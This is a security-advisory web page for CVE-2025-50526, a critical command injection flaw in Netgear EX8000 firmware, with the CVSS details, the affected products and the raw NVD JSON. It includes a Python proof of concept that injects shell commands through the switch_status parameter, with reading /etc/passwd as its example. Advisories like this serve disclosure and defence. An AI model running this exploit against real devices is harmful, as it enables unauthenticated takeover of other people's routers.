Security Vulnerability Report
中文
CVE-2025-50526 CVSS 9.8 CRITICAL

CVE-2025-50526

Published: 2025-12-23 16:16:23
Last Modified: 2026-01-02 14:45:22

Description

Netgear EX8000 V1.0.0.126 was discovered to contain a command injection vulnerability via the switch_status function.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:netgear:ex8000_firmware:1.0.0.126:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:* - NOT VULNERABLE
Netgear EX8000 V1.0.0.126

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-50526 PoC - Netgear EX8000 Command Injection # Target: Netgear EX8000 V1.0.0.126 # Vulnerability: Command injection in switch_status function TARGET_IP = "192.168.1.1" # Replace with target IP TARGET_PORT = 80 def exploit_command_injection(target_ip, command): """ Execute command injection exploit on switch_status function """ url = f"http://{target_ip}:{TARGET_PORT}/switch_status.cgi" # Malicious payload with command injection # The switch_status parameter is vulnerable to command injection payload = { "switch_status": f";{command};#" } try: response = requests.post(url, data=payload, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" # Example: Read /etc/passwd file if __name__ == "__main__": print("[*] CVE-2025-50526 - Netgear EX8000 Command Injection") print(f"[*] Target: {TARGET_IP}") # Example command execution result = exploit_command_injection(TARGET_IP, "cat /etc/passwd") print(f"[+] Result:\n{result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50526", "sourceIdentifier": "[email protected]", "published": "2025-12-23T16:16:22.620", "lastModified": "2026-01-02T14:45:21.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netgear EX8000 V1.0.0.126 was discovered to contain a command injection vulnerability via the switch_status function."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:ex8000_firmware:1.0.0.126:*:*:*:*:*:*:*", "matchCriteriaId": "F2BA94AB-B85E-4EA2-9DF0-CDBED59930EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:ex8000:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D9781C9-799A-4BDA-A027-987627A01633"}]}]}], "references": [{"url": "https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/cve-netgear_EX8000_CI_switch_status.pdf", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/netgear_EX8000_CI_switch_status.mp4", "source": "[email protected]", "tags": ["Broken Link"]}]}}